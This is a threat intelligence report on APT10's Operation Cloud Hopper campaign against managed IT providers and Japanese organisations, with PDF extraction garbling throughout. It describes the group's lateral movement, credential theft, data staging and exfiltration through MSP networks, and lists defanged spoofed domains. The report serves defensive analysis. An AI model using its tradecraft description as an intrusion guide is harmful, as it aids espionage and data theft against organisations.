The defence industrial base comprises the US Department of Defense and a plethora of companies that support the design, development and
maintenance of defence assets and enable US military requirements to be met. https://www.dhs.gov/defense-industrial-base-sector
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf
http://blog.trendmicro.com/trendlabs-security-intelligence/evilgrab-malware-family-used-in-targeted-attacks-in-asia/
Operation Cloud Hopper
Time-based analysis of APT10
s operations
Shown in Figure 1 are registration times4, represented in UTC,
for known APT10 top level domains since mid-2016, which
mark a major uptick in APT10 activity.
Figure 1: APT10 domain registration times in UTC
Figure 2: APT10 domain registration times in UTC+8
Mapping this to UTC+8, as in Figure 2, shows a standard set
of Chinese business hours, including a two-hour midday
break.
Apr 2017
Apr 2017
Mar 2017
Mar 2017
Feb 2017
Feb 2017
Jan 2017
Jan 2017
Date (days)
Date (days)
As part of our analysis, we have made a number of
observations about APT10 and its profile, which supports our
assessment that APT10 is a China-based threat actor. For
example, we have identified patterns within the domain
registrations and file compilation times associated with
APT10 activity. This is almost certainly indicative of a threat
actor based in the UTC+8 time zone, which aligns to Chinese
Standard Time (CST).
Dec 2016
Nov 2016
Dec 2016
Nov 2016
Oct 2016
Oct 2016
Sep 2016
Sep 2016
Aug 2016
00:00 02:00 04:00 06:00 08:00 10:00 12:00 14:00 16:00 18:00 20:00 22:00
01:00 03:00 05:00 07:00 09:00 11:00 13:00 15:00 17:00 19:00 21:00 23:00
Aug 2016
00:00 02:00 04:00 06:00 08:00 10:00 12:00 14:00 16:00 18:00 20:00 22:00
01:00 03:00 05:00 07:00 09:00 11:00 13:00 15:00 17:00 19:00 21:00 23:00
Time of Day (UTC)
Time of Day (UTC+8)
Shifting this to UTC+8 shows a similar timeframe of
operation to the domain registrations. There are some
outliers, which are likely attributable to the operational
nature of this threat actor, such as requirements to work
outside normal business hours.
Figure 3: Compile times of PlugX, RedLeaves and Quasar in UTC
Figure 4: Compile times of PlugX, RedLeaves and Quasar in UTC+8
Jul 2017
Jul 2017
Jan 2017
Jan 2017
Jul 2015
Jul 2015
Jan 2016
Jan 2016
Date (days)
Date (days)
Further analysis of the compile times of PlugX, RedLeaves and
Quasar malware samples used by APT10 reveals a similar
pattern in working hours, as shown in Figure 3.
Jul 2015
Jan 2015
Jan 2015
Jul 2014
Jul 2014
Jan 2014
Jan 2014
Jul 2013
00:00 02:00 04:00 06:00 08:00 10:00 12:00 14:00 16:00 18:00 20:00 22:00
01:00 03:00 05:00 07:00 09:00 11:00 13:00 15:00 17:00 19:00 21:00 23:00
Jul 2013
00:00 02:00 04:00 06:00 08:00 10:00 12:00 14:00 16:00 18:00 20:00 22:00
01:00 03:00 05:00 07:00 09:00 11:00 13:00 15:00 17:00 19:00 21:00 23:00
Time of Day (UTC)
Jul 2015
Time of Day (UTC+8)
The bubbles shown on Figures 1 through 6 are representative of the number of events observed at that time and date.
Operation Cloud Hopper
When applying the time shift to the ChChes malware (newly
used by APT10) compilation timestamps, we see a different
pattern as shown in Figure 5. While this does not align with
Chinese business hours, it is likely to be either a result of the
threat actor changing its risk profile by attempting to obscure
or confuse attribution or a developer
s side project that has
ended up being used on targeted operations. Based on other
technical overlaps, ChChes is highly likely to be exclusively
used by APT10.
Figure 5: Compile time of ChChes in UTC
Figure 6: Compile time of ChChes in UTC+8
Dec 15, 2016
Dec 15, 2016
Dec 1, 2016
Dec 1, 2016
Nov 17, 2016
Date (days)
Nov 3, 2016
Nov 3, 2016
Oct 20, 2016
Oct 20, 2016
Oct 6, 2016
Oct 6, 2016
Sep 22, 2016
00:00 02:00 04:00 06:00 08:00 10:00 12:00 14:00 16:00 18:00 20:00 22:00
01:00 03:00 05:00 07:00 09:00 11:00 13:00 15:00 17:00 19:00 21:00 23:00
00:00 02:00 04:00 06:00 08:00 10:00 12:00 14:00 16:00 18:00 20:00 22:00
01:00 03:00 05:00 07:00 09:00 11:00 13:00 15:00 17:00 19:00 21:00 23:00
Time of Day (UTC+8)
Time of Day (UTC)
Figure 7: Operational times of APT10 in UTC+8
Thur
The sum of this analysis aligns with the evidence provided by
the United States Department of Justice indictment against
several individuals associated with APT1,5 another Chinabased threat actor, showing a working day starting at 08:00
UTC+8 and finishing at 18:00 UTC+8 with a two hour lunch
break from 12:00 UTC+8 until 14:00 UTC+8.
To further this analysis, we have observed the threat actor
conducting interactive activities primarily between the hours
of midnight and 10:00 UTC, as shown in Figure 7. When
converting this to UTC+8 we again see a shift to Chinese
business hours, with operations occurring between 08:00 and
19:00. It is a realistic probability that the weekend work
observed in Figure 7 may be necessary as part of operational
requirements.
Sep 22, 2016
23:00
Date (days)
Nov 17, 2016
18:00
04:00
05:00
17:00
16:0
11:00
10:0
12:00
06:0
Number of events
1-10
11-20
21-30
31-40
41-50
https://www.justice.gov/iso/opa/resources/5122014519132358461949.pdf
Operation Cloud Hopper
Identifying a change in APT10
targeting
APT10 has, in the past, primarily been known for its
targeting of government and US defence industrial base
organisations, with the earliest known date of its activity
being in December 2009. Our research and observations
suggest that this targeting continues to date.
During the 2013
2014 period there was a general downturn
in the threat actor
s activities, as was also seen with other
related groups. It was widely assessed that this was due to
the public release of information surrounding APT1, which
exposed its toolset and infrastructure.
From our analysis and investigations, we have identified
APT10 as actively operating at least two specific campaigns,
one targeting MSPs and their clients, and one directly
targeting Japanese entities.
MSP focused campaign
APT10 has almost certainly been undertaking a
global operation of unprecedented size and scale
targeting a number of MSPs.
APT10 has vastly increased the scale and scope of its
targeting to include multiple sectors, which has likely been
facilitated by its compromise of MSPs. Such providers are
responsible for the remote management of customer IT and
end-user systems, thus they generally have unfettered and
direct access to their clients
networks. They may also store
significant quantities of customer data on their own internal
infrastructure.
Other threat actors have previously been observed using
a similar method of a supply chain attack, for example, in
the compromise of Dutch certificate authority Diginotar in
20116 and the compromise of US retailer Target in 2013.7
The command and control (C2) infrastructure chosen by
APT10 for Operation Cloud Hopper is predominantly
referenced using dynamic-DNS domains. The various
domains are highly-interconnected through shared IP
address hosting, even linking back historically to the threat
actor
s much older operations.
At present, the indicators detailing APT10
s operations
number into the thousands and cannot be easily visualised.
The graph in Figure 8 overleaf depicts a high-level view of the
infrastructure used by APT10 throughout 2016. As the
campaign has progressed into 2017, the number of dynamicDNS domains in use by the threat actor has significantly
increased.
The graph in Figure 9, also shown overleaf, extracts one node
of the newer C2 from the infrastructure shown in Figure 8
and maps this to the older infrastructure of APT10, as
disclosed by FireEye in their 2014 Siesta Campaign blog
post8. In terms of timing, it is highly likely that a single party
is responsible for all of these domains, based on our
observations of infrastructure overlap.
Through our investigations, we have identified multiple
victims who have been infiltrated by the threat actor. Several
of these provide enterprise services or cloud hosting,
supporting our assessment that APT10 are almost certainly
targeting MSPs. We believe that the observed targeting of
MSPs is part of a widescale supply-chain attack.
MSPs therefore represent a high-payoff target for espionagefocused threat actors such as APT10. Given the level of client
network access MSPs have, once APT10 has gained access to
a MSP, it is likely to be relatively straightforward to exploit
this and move laterally onto the networks of potentially
thousands of other victims. This, in turn, would provide
access to a larger amount of intellectual property and
sensitive data. APT10 has been observed to exfiltrate stolen
intellectual property via the MSPs, hence evading local
network defences.
https://security.googleblog.com/2011/08/update-on-attempted-man-in-middle.html
https://krebsonsecurity.com/2014/02/target-hackers-broke-in-via-hvac-company/
https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-the-siesta-campaign.html
Operation Cloud Hopper
Figure 8: High-level view of infrastructure used by APT10 throughout 2016
Figure 9: Infrastructure graph linking early Plugx domains to recent APT10 domains
Operation Cloud Hopper
a l m a n uf a ct
r in
ti o
tr i
and C o nsu
a il
Sectors targeted
g a n d C ons
y an d Min
c a ls a n d Li
B u si
Te c
h n olo gy
u ti
r vi
b li c s e cto r
d Pr
ie n
M et a l s
o fe s s i o
Countries targeted
Norway
France
Canada
Finland
Sweden
Switzerland
South Korea
Japan
India
Thailand
Brazil
South Africa
Operation Cloud Hopper
Australia
Japan focused campaign
In a separate series of operations, APT10 has been
systematically targeting Japanese organisations using
bespoke malware referred to in the public domain as
ChChes
While linked to APT10, via shared infrastructure, this
campaign exhibits some operational differences suggesting a
potential sub-division within the threat actor. These
operations have seen APT10 masquerading as legitimate
Japanese public sector entities (such as the Ministry of Foreign
Affairs, Japan International Cooperation Agency and the
Liberal Democratic Party of Japan) to gain access to the victim
organisations.
Targeting of these entities by APT10 is consistent with
previous targeting by China-based threat actors of a wide
range of industries and sectors in Japan. This includes the
targeting of commercial companies, and government
agencies, both of which has resulted in the exfiltration of large
amounts of data.9
APT10
s standard compromise methodology begins with a
spear phishing email sent to the target, usually with an
executable attachment designed to lure the victim to open it.
Analysis of the filenames associated with some of the latest
APT10 malware samples, particularly from late 2016,
highlights the use of Japanese language filenames which
clearly indicates a campaign targeting Japanese-speaking
individuals. Further analysis of these files can be found in
Annex B.
Table 1 shows some example file names being used by APT10
in this campaign.
Table 1: Japanese language filenames used by APT10
Japanese Filename
Translation
1102
)._exe
1102 Mainich Newspaper (answer)._exe
2016
1025.exe
2016 Prefectural University Symposium A4_1025.exe
(28.11.07).exe
Business contact invitation (28.11.07).exe
.exe
Regarding provision of Individual number.exe
Japan-US expansion deterrence conference (e)
.exe
Foundation of Russian historical association and Composing
a unity
state history textbook.exe
The following is an example of a malicious decoy document referencing Mitsubishi Heavy Industries:
Figure 10: Decoy document based on press
release from Japanese firm Mitsubishi
Heavy Industries detailing the unveiling of
their new ABLASER-DUV (Deep Ultraviolet
Laser)
http://thediplomat.com/2016/04/japans-achilles-heel-cybersecurity/
Operation Cloud Hopper
A notable tactic of this APT10 subset is to register C2 domains that closely resemble legitimate Japanese organisations. Table 2
shows a selection of the spoofed domains registered, alongside the email addresses listed at registration and the legitimate
impersonated domains.
Table 2: Domains observed being impersonated by APT10
Domain
Imitating
Theme
Description
bdoncloud[.]com
Unknown
Cloud
Generic Cloud theme
catholicmmb[.]com
cmmb.org
Religion
Catholic Medical Mission Board
ccfchrist[.]com
ccf.org.ph
Christ
s Commission Fellowship
based in Philippines
cwiinatonal[.]com
cwi.org.uk
Christian Witnesses to Israel
usffunicef[.]com
unicefusa.org
salvaiona[.]com
salvationarmy.org
meiji-ac-jp[.]com
meiji.ac.jp
u-tokyo-ac-jp[.]com
u-tokyo.ac.jp
jica-go-jp[.]bike
jica.go.jp
jica-go-jp[.]biz
jica.go.jp
jimin-jp[.]biz
jimin.jp
Liberal Democratic Party of Japan
mofa-go-jp[.]com
mofa.go.jp
Ministry of Foreign Affairs
cloud-kingl[.]com
cloud-maste[.]com
incloud-go[.]com
incloud-obert[.]com
Charity
United States Fund For Unicef
The Salvation Army
Japan /
Academic
Meiji University in Japan
Japan / Public
Sector
Japan International Cooperation Agency
Tokyo University in Japan
Japan International Cooperation Agency
The top level C2 domains observed in this campaign share a number of features that can be used to further identify affiliated
nodes. Table 3 displaying registrant information can be seen below:
Table 3: Known APT10 registration details showing a common name server
Domain
Registrant email
Name Server
Contact Name
Contact Street
belowto[.]com
robertorivera@india.com
ns1.ititch.com
Roberto Rivera
904 Peck Street Manchester, NH 03103
ccfchrist[.]com
wenonatmcmurray@india.com
ns1.ititch.com
Wenona
McMurray
824 Ocala Street Winter Park, FL 32789
cloud-maste[.]
meganfdelgado@india.com
ns1.ititch.com
Megan Delgado 3328 Sigley Road Burlingame, KS 66413
poulsenv[.]com
abellonav.poulsen@yandex.com ns1.ititch.com
Abellona
Poulsen
unhamj[.]com
juanitardunham@india.com
ns1.ititch.com
Juanita Dunham 745 Melody Lane Richmond, VA 23219
wthelpdesk[.]com armandovalcala@india.com
ns1.ititch.com
Armando Alcala 608 Irish Lane Madison, WI 53718
Operation Cloud Hopper
2187 Findley Avenue Carrington, ND
58421
None of the domains share identical contact information other
than stating that the respective registrants are based in the
US. The contact streets, organisations, and names are all
distinct between domains.
in the report. This connection is highlighted in the
infrastructure graph shown in Figure 11 below, where some
ChChes C2 domains can be seen in the bottom left, while on
the far right are the older APT10 domains referenced in
previous reporting.
Some of the domains, that do resolve, share common IP
address space with the network of dynamic-DNS domains that
we associate with Operation Cloud Hopper as detailed earlier
Figure 11: Infrastructure graph linking early PlugX domains to recent ChChes domains
Operation Cloud Hopper
Motivations behind APT10
s targeting
A short history of China-based hacking
China-based threat actors have a long history of cyber espionage in the traditional political, military and defensive arena, as
well as industrial espionage for economic gain. Some of the most notable of these events from the past decade are shown below
Figure 12:
Timeline of China-based hacking activity
2006-13: APT1 conducted a
widespread cyber espionage
campaign against hundreds of
organisations spanning a number of
sectors. Most victims primarily
conducted their business in English and
had a nexus with China
s strategic
priorities.
2006
2009: The Night Dragon campaign
involved covert cyber attacks on
global oil, energy and petrochemical
companies and individuals in Kazakhstan,
Taiwan, Greece and the US. The attackers
used a number of vectors including social
engineering and OS vulnerabilities to access
proprietary operations and
nancial
information
2007
2010: Technology,
nancial and
defence sectors were targeted by
Operation Aurora, a campaign
attributed to APT17/Aurora Panda. The
list of targets included Google, who
suffered the loss of intellectual property
and attempted access to the Gmail
accounts of human rights activists.
2009: GhostNet is the alleged
Chinese group responsible for
running a global campaign starting in
2009 targeting foreign embassies and
ministries, NGOs, news media institutions
and Tibet-related organisations.
2008
2009
2010-12: Between 2010 and
2012 organisations in the energy
and material manufacturing sectors
were targeted. These included
Westinghouse Electric, who had technical
and design speci
cations for pipes, pipe
supports and routing stolen in 2010.
Additionally, emails of senior
decision-makers involved in the business
relationship with a Chinese state-owned
enterprise were taken. In 2012,
SolarWorld was compromised with
attackers stealing sensitive business
information relating to manufacturing
metrics, and production line information
and costs. It is thought to have been
targeted strategically at a time when
Chinese manufacturers of solar products
were seeking to enter the US market at
below fair value prices.
2013: Operation Iron Tiger is an
attack campaign attributed to APT31,
in which US government contractors were
targeted in the areas of technology,
telecommunications, energy and
manufacturing.
2010
2009: Three medical device
makers (Medtronic, Boston Scienti
St. Jude Medical) were allegedly
compromised by Chinese actors. Although
the motive is unclear, patient data was not
thought to be stolen, making industrial
espionage the most likely intention.
2011
2012
2014-15: The personal data of over
20 million people was compromised
from the US Of
ce of Personnel
Management and attributed to China-based
actors. This included Social Security
numbers as well as security clearance and
job applications for government positions.
2013
2014: The data of 4.5 million
members of US-based healthcare
organisation, Community Health
Systems was potentially accessed
during a breach attributed to APT18.
2014-15: Several healthcare
were targeted
Anthem, Premera
Blue Cross and CareFirst all suffered data
breaches in 2015. These were linked
to APT19.
2014
2015
Operation Cloud Hopper
Operation Cloud Hopper
APT10 alignment with previous China-based hacking
Espionage attacks associated with China-based threat actors,
as noted above, have traditionally targeted organisations that
are of strategic value to Chinese businesses and where
intellectual property obtained from such attacks could
facilitate domestic growth or advancement.
There has been significant open source reporting which has
documented the alignment between apparent information
collection efforts of China-based threat actors and the
strategic emerging industries documented in China
s Five Year
Plan (FYP).10 The 13th FYP was released in March 2016 and
the sectors and organisations known to be targeted by APT10
are broadly in line with the strategic aims documented in this
plan. These aims outlined in the FYP will largely dictate the
growth of businesses in China and are, therefore, likely to also
form part of Chinese companies
business strategies.
The latest FYP describes five principles which underpin
China
s goal of doubling its 2010 GDP by 2020. At the
forefront of these principles is innovation, largely focused
around technological innovation, with China expected to
invest 2.5% of GDP in research and development to attain
technological advances, which are anticipated to contribute
60% towards economic growth objectives.11 The areas of
innovation expected to receive extensive investment include,
next-generation communications, new energy, new materials,
aerospace, biological medicine and smart manufacturing.
In addition to the FYP principle of innovation, China is also
promoting ten key industries in which it wants to improve
innovation in manufacturing as part of the
Made in China
2025
initiative.12
Figure 13: Industries of interest outlined by
Made in China
2025
initiative
Agricultural
machinery
Next
generation
information
technology
Numeric
control
tools and
robotics
Medicine
medical
devices
Aerospace
equipment
Made in
China 2025
industries
Ocean
engineering
equipment
and high-tech
ships
materials
Power
equipment
Energy
saving and
new energy
vehicles
Railway
equipment
Observed APT10 targeting is in line with many of the historic
compromises we have outlined previously as originating from
China. This targeting spans industries that align with China
13th FYP which would provide valuable information to
advance the domestic innovation goals held within China.
Given the broad spectrum of priority industries, the
compromise of MSPs represents an efficient method of
information collection. This strategy also provides additional
obfuscation for the actor as any data exfiltrated is taken back
through the initial compromised company
s systems, creating
a much more difficult trail to follow.
10 https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
11 https://www.pwccn.com/en/migration/pdf/govt-work-review-mar2016.pdf
12 http://www.pwccn.com/en/migration/pdf/prosperity-masses-2020.pdf
Operation Cloud Hopper
Shining a light on APT10
s methodology
sto m er
Data of interest to APT10
is accessed by the threat
actor moving laterally
through systems
custom
Compressed
les
lled
with stolen data are
moved from the MSP
customer
s network
back onto the MSP
network
Targ ted
D ata
MSP customer data
collected by APT and
compressed, ready
for ex
ltration from
the network
io n
MSP customers who
align to APT10
targeting pro
le are
accessed by the threat
actor using the MSPs
legitimate access
APT10 ex
ltrates stolen
data back through
MSPs to infrastructure
controlled by the threat
actor
APT10
APT10
compromises
Managed IT
Service Providers
geted MS
r e x
This section details changes made to APT10 tools, techniques
and procedures (TTPs) post-2014, following its shift from
Poison Ivy to PlugX. These TTPs have been identified as part
of our incident response and threat intelligence investigations
and have been used in both of the recent campaigns we have
encountered. The examples provided in this section will be
drawn from both of those campaigns.
Figure 14: Decoy document used by APT10 to target the
Japanese education sector
Reconnaissance and targeting
It is often difficult to identify the early stages of a threat
actor
s preparation for an attack as these initial activities tend
to occur below the line of visibility. Our analysis of the most
recently used decoy documents by APT10 in its spear phishing
campaigns, which is the primary delivery method of its
payloads, indicates the actor performs a significant level of
research on its targets. In line with commonly used APT actor
methodologies, the threat actor aligns its decoy documents to
a topic of interest relevant to the recipient.
In the example shown in Figure 14 to the right, an official
document hosted on the Japan Society for the Promotion of
Science website was weaponised and deployed as part of a
spear phishing campaign against a Japanese target in the
education sector.
Operation Cloud Hopper
APT10 has been known to use research from their
reconnaissance to obtain company email addresses, and then
craft a message containing either a malicious attachment or a
link to a malicious site.
Figure
15: Timelineof
ofAPT10
APT10 related
activities
Summary
activity
2014
Targets East Asian
manufacturer and
Japanese Public
Policy organisations
2009
Group
rst detected
targeting Western
defence companies
2009
Q4 2014
Targets European
organisations
2013
Legend
APT10 activity
Other events
Q1 2017
APT10 sustains
targeting of
European
organisations
2014
2016
August 2013
FireEye - Poison Ivy:
Assessing damage
and extracting
intelligence
As part of the same campaign, we have also observed an email
sent by APT10,13 referencing a Scientific Research Grant
Program, and targeting various Japanese education institutes
including Meiji University14 and Chuo University.15 The email
included a zip file containing a link to download a payload
from one of APT10
s servers, the ChChes Powersploit exploit,
detailed in Annex B.
Initial compromise and lateral
movement
Once on a target network, the actor rapidly deploys malware
to establish a foothold, which may include one or more
systems that provide sustained access to a victim
s network.
As APT10 works to gain further privileges and access, it also
conducts internal reconnaissance, mapping out the network
using common Windows tools, and in later stages of the
compromise using open source pentesting tools, detailed in
Annex B.
This reconnaissance is run in parallel with the actor ensuring
that it has access to legitimate credentials. We have observed
that in cases where APT10 has infiltrated a target via an MSP,
it continues to use the MSPs credentials. In order to gain any
further credentials, APT10 will usually deploy credential theft
tools such as mimikatz or PwDump, sometimes using DLL load
order hijacking, to use against a domain controller, explained
further in Annex B. Regular communications checks are then
executed in order to maintain this level of access. In most
cases, these stolen MSP credentials have provided
administrator or domain administrator privileges.
We have observed the threat actor copying malware over to
systems in a compromised environment, which did not have
March 2014
Trend Micro &
FireEye release
reports on links
between APT1 and
APT10
2017
Q4 2016
Targets Japanese
organisations
any outbound internet access. In one of these instances, the
threat actor spent more than an hour attempting to establish
an outbound connection using PlugX until it realised that the
host had no internet access, at which point the malware and
all supporting files were deleted. APT10 achieves persistence
on its targets primarily by using scheduled tasks or Windows
services in order to ensure the malware remains active
regardless of system reboots.
APT10 heavily leverages the shared nature of client-side MSP
infrastructure to move laterally between MSPs and other
victims. Systems that share access and thus credentials, from
both a MSP and one of its clients serve as a way of hopping
between the two.
Figure 16: Client
MSP shared infrastructure
t in
frastructure
P infrastructu
Systems sharing credentials across the client and the
MSP are of particular interest to APT10, and are
commonly used by the threat actor in order to gain
access to new areas of the network
13 http://csirt.ninja/?p=1103
14 http://www.meiji.ac.jp/isc/information/2016/6t5h7p00000mjbbr.html
15 http://www.chuo-u.ac.jp/research/rd/grant/news/2017/01/51783/
Operation Cloud Hopper
APT10 simultaneously targets both low profile and high value
systems to gain network persistence and a high level of access
respectively. For example, in addition to compromising high
value domain controllers and security servers, the threat actor
has also been observed identifying and subsequently
installing malware on low profile systems that provide
non-critical support functions to the business, and are thus
less likely to draw the attention of system administrators.
As part of the long-term access to victim networks, we have
observed APT10 consistently install updates and new
malware on compromised systems. In the majority of
instances APT10 used either a reverse shell or RDP connection
to install its malware; the actor also uses these methods to
propagate across the network.
Using these techniques, APT10
pushes
data from victim
networks to other networks they have access to, such as other
MSP or victim networks, then, using similar methods,
pulls
the data from those networks to locations from which they
can directly obtain it, such as the threat actor
s C2 servers.
APT10
s ability to bridge networks can therefore be
summarized as:
Use of legitimate MSP credentials to management systems
which bridge the MSP and multiple MSP customer
networks;
Use of RDP to interactively access systems in both the MSP
management network and MSP customer networks;
Use of t.vbs to execute command line tools; and,
Use of PSCP and Robocopy to transfer data.
Communication checks are usually conducted using native
Windows tools such as ping.exe, net.exe and tcping.exe. The
actor will frequently
net use
to several machines within
several seconds, connecting for as little as five seconds, before
disconnecting. Further details are provided in Annex B.
Network hopping and
exfiltration
Once APT10 have a foothold in victim networks, using either
legitimate MSP or local domain credentials, or their sustained
malware such as PlugX, RedLeaves or Quasar RAT, they will
begin to identify systems of interest.
The operator will either access these systems over RDP, or
browse folders using Remote Access Trojan (RAT)
functionality, to identify data of interest. This data is then
staged for exfiltration in multi-part archives, often placed in
the Recycle Bin, using either RAR or TAR. The compression
tools are often launched via a remote command execution
script which is regularly named
t.vbs
and is a customised
version of an open source WMI command executor which
pipes the command output back to the operator.
We have observed these archives being moved outside of the
victim networks, either back into to the MSP environments or
to external IP addresses in two methods, which are also
performed via the command line using t.vbs:
1. Mounting the target external network share with
net use
and subsequently using the legitimate Robocopy tool to
transfer the data; and,
2. Using the legitimate Putty Secure Copy Client (PSCP),
sometimes named rundll32.exe, to transfer the data
directly to the third party system.
Operation Cloud Hopper
APT10 malware
We classify APT10
s malware into two distinct areas: tactical
and sustained. The tactical malware, historically EvilGrab,
and now ChChes (and likely also RedLeaves), is designed to be
lightweight and disposable, often being delivered through
spear phishing. Once executed, tactical malware contains the
capability to profile the network and manoeuvre through it to
identify a key system of interest. The sustained malware,
historically Poison Ivy, PlugX and now Quasar provides a more
comprehensive feature set. Intended to be deployed on key
systems, the sustained malware facilitates long-term remote
access and allows for operators to more easily carry out
administration tasks.
Since late 2016, we have seen the threat actor develop several
bespoke malware families, such as ChChes and RedLeaves.
Additionally, it has taken the open source malware, Quasar,
and extended its capabilities, ensuring the incrementation of
the internal version number as it does so.
We have also observed APT10 use DLL search order hijacking
and sideloading, to execute some modified versions of
open-source tools. For example, PwC UK has observed APT10
compiling DLLs out of tools, such as MimiKatz and PwDump6,
and using legitimate, signed software, such as Windows
Defender to load the malicious payloads.
In Annex B we provide detailed analysis of several of the
threat actor
s tools as well as the common Windows tools we
have observed being used.
Timeline
Figure 17: Timeline of APT10 malware use
2009
2010
2011
2012
2013
2014
2015
2016
2017
Poison Ivy
PlugX
EvilGrab
ChChes
Quasar
RedLeaves
Retooling Efforts
Alongside APT10
s TTPs, we have observed a
retooling
cycle.
Given the pace of technological change and the wide range of
freely available online tools and scripts, it is not unusual for
an actor to re-evaluate its capabilities and to benchmark
multiple offerings against each other. We have observed a
decline in the deployment of some of APT10
s traditional core
tool set, and witnessed an increase in the development and
deployment of additional new tools which combine in-house
development and open source projects. We assess that this is
highly likely due to the public release of APT10 malware by
cyber security vendors.
During our analysis of victim networks, we were able to
observe APT10 once again initiate a retooling cycle in late
2016. We observed the deployment and testing of multiple
versions of Quasar malware,16 and the introduction of the
bespoke malware families ChChes and RedLeaves.
We assess it is highly likely that due to the frequent public
release of information linking PlugX with China-based threat
actors, continual long-term use had become unsustainable,
introducing an additional operational overhead that is easily
attributable to China-based threat actors.
Throughout our investigations, we have observed multiple
deployments of the PlugX malware from 2014 to at least 2016.
This, along with the downturn in the use of Poison Ivy,
supports the notion that a major retooling operation took
place post 2014. Additional analysis of the infrastructure
associated with each distinct version of PlugX also shows an
increase in maturity over time. Earlier PlugX versions were
configured with legacy domains and IP addresses, which were
originally isolated and more obvious, whereas more recent
versions have demonstrated a standardised convention for
domain names and IP selection.
16 https://github.com/quasar/QuasarRAT
Operation Cloud Hopper
Conclusion
APT10 is a constantly evolving, highly
persistent China-based threat actor that
has an ambitious and unprecedented
collection programme against a broad
spectrum of sectors, enabled by its
strategic targeting.
Since exposure of its operations in 2013, APT10 has made a
number of significant changes intended to thwart detection of
its campaigns. PwC UK and BAE Systems, working closely
with industry and government, have uncovered a new,
unparallelled campaign which we refer to as Operation Cloud
Hopper. This operation has targeted managed IT service
providers, the compromise of which provides APT10 with
potential access to thousands of further victims. An additional
campaign has also been observed targeting Japanese entities.
APT10
s malware toolbox shows a clear evolution from
malware commonly associated with China-based threat actors
towards bespoke in-house malware that has been used in
more recent campaigns; this is indicative of APT10
increasing sophistication, which is highly likely to continue.
The threat actor
s known working hours align to Chinese
Standard Time (CST) and its targeting corresponds to that of
other known China-based threat actors, which supports our
assessment that these campaigns are conducted by APT10.
This campaign serves to highlight the importance of
organisations having a comprehensive view of their threat
profile, including that of their supply chain
s. More broadly,
it should also encourage organisations to fully assess the
risk posed by their third party relationships, and prompt
them to take appropriate steps to assure and manage these.
A detailed technical annex supplements this main report,
which provides further information about the tools and
techniques used by APT10 and contains Indicators of
Compromise relating to all of this threat actor
s known
campaigns. These have already been provided to the National
Cyber Security Centre for dissemination through their usual
channels.
Operation Cloud Hopper
Appendices
Operation Cloud Hopper
Appendix A
Collaboration between PwC UK and BAE Systems
PwC and BAE Systems
respective Threat Intelligence teams share a mutual interest in new cyber threats. PwC and BAE
Systems partnered through their membership of the Cyber Incident Response (CIR) scheme to share intelligence and develop
the most comprehensive picture possible of this threat actor
s activities. Information sharing like this underpins the security
research community and serves to aid remediation and inform decisions that companies make about their security needs.
Probabilistic language
Interpretations of probabilistic language (for example,
likely
or
almost certainly
) vary widely, and to avoid
misinterpretation we have used the following qualitative terms within this report when referring to the level of confidence we
have in our assessments. Unless otherwise stated, our assessments are not based on statistical analysis.
Table 4: Probabilistic language
Qualitative term
Associated probability range
Remote or highly unlikely
Less than 10%
Improbable or unlikely
10-25%
Realistic probability
26-50%
Probable or likely
51-75%
Highly probable or highly likely
76-90%
Almost certain
More than 90%
Operation Cloud Hopper
Appendix B
PwC UK reporting
PwC UK Threat Intelligence has previously published a range
of APT10 related reporting, both in the public domain and via
our subscription service. These reports are as follows:
APT10 resumes operations with a vengeance, in
Threats Under the Spotlight
CTO-TUS-20170321-01A
NetEaseX and the Secret Key to Lisboa
CTO-TIB20170313-01A
BlackDLL
APT10
s .NET Foray
CTO-TIB-20170301-01B
Quasar
APT10 pauses for Chinese New Year, in Threats Under
the Spotlight
CTO-TUS-20170220-01A
CVNX
s sting in the tail
CTO-TIB-20170123-01A
ChChes (Scorpion) Malware
China and Japan: APT to dispute -CTO-SIB-2017011901A
Taiwan Presidential Election: A Case Study on
Thematic Targeting, http://pwc.blogs.com/cyber_
security_updates/2016/03/taiwant-election-targetting.
html, published 2016-03-17. Overview of EvilGrab and it
being used against Asian targets, specifically around the
2016 Taiwanese election
Scanbox II
CTO-TIB-20150223-01A
IST-Red Apollo-002
Red Apollo Tearsheet
Third party reports
A number of organisations have also published related
reporting, as follows:
RedLeaves
Malware Based on Open Source RAT
http://blog.jpcert.or.jp/2017/04/redleaves---malwarebased-on-open-source-rat.html
Further technical
reporting on RedLeaves, revealing links to an open source
RAT.
The relevance between the attacker group menuPass
and malware (Poison Ivy, PlugX, ChChes), https://
www.lac.co.jp/lacwatch/people/20170223_001224.html,
published 2017-02-23. Links APT10 to ChChes, Poison Ivy
and PlugX.
menuPass Returns with New Malware and New
Attacks Against Japanese Academics and
Organizations, http://researchcenter.paloaltonetworks.
com/2017/02/unit42-menupass-returns-new-malwarenew-attacks-japanese-academics-organizations/,
published 2017-02-16. APT10 attacks on Japanese
academics. Includes info on ChChes (technical), Poison Ivy
and PlugX.
ChChes
Malware that Communicates with C&C
Servers Using Cookie Headers, http://blog.jpcert.or.
jp/2017/02/chches-malware--93d6.html, published
2017-02-15. Technical overview of ChChes malware with
IOCs.
PlugX TrendMicro
tearsheet
, https://www.
trendmicro.com/vinfo/us/threat-encyclopedia/malware/
plugx, published 2016-09-07. Technical info and IOCs for
PlugX.
A Detailed Examination of the Siesta Campaign,
https://www.fireeye.com/blog/
threat-research/2014/03/a-detailed-examination-of-thesiesta-campaign.html, published 2014-03-12. Provides a
detailed analysis of activity dubbed the Siesta campaign.
POISON IVY: Assessing Damage and Extracting
Intelligence, https://www.fireeye.com/content/dam/
fireeye-www/global/en/current-threats/pdfs/rpt-poisonivy.pdf, published 2013-08-21. Technical report on Poison
Ivy and campaigns that have used it, including menuPass.
EvilGrab Malware Family Used In Targeted Attacks In
Asia, http://blog.trendmicro.com/trendlabs-securityintelligence/evilgrab-malware-family-used-in-targetedattacks-in-asia/, published 2013-09-18. Technical
overview of EvilGrab.
CrowdCasts Monthly: You Have an Adversary Problem,
https://www.slideshare.net/CrowdStrike/crowd-castsmonthly-you-have-an-adversary-problem, published
2013-10-16, a presentation on Chinese actors including
APT, crime and hacktivist. Includes section on Stone
Panda (APT10).
PlugX: New Tool For a Not So New Campaign, http://
blog.trendmicro.com/trendlabs-security-intelligence/
plugx-new-tool-for-a-not-so-new-campaign/, published
2012-09-10. Gives an introduction to PlugX.
Pulling the Plug on PlugX, https://www.trendmicro.
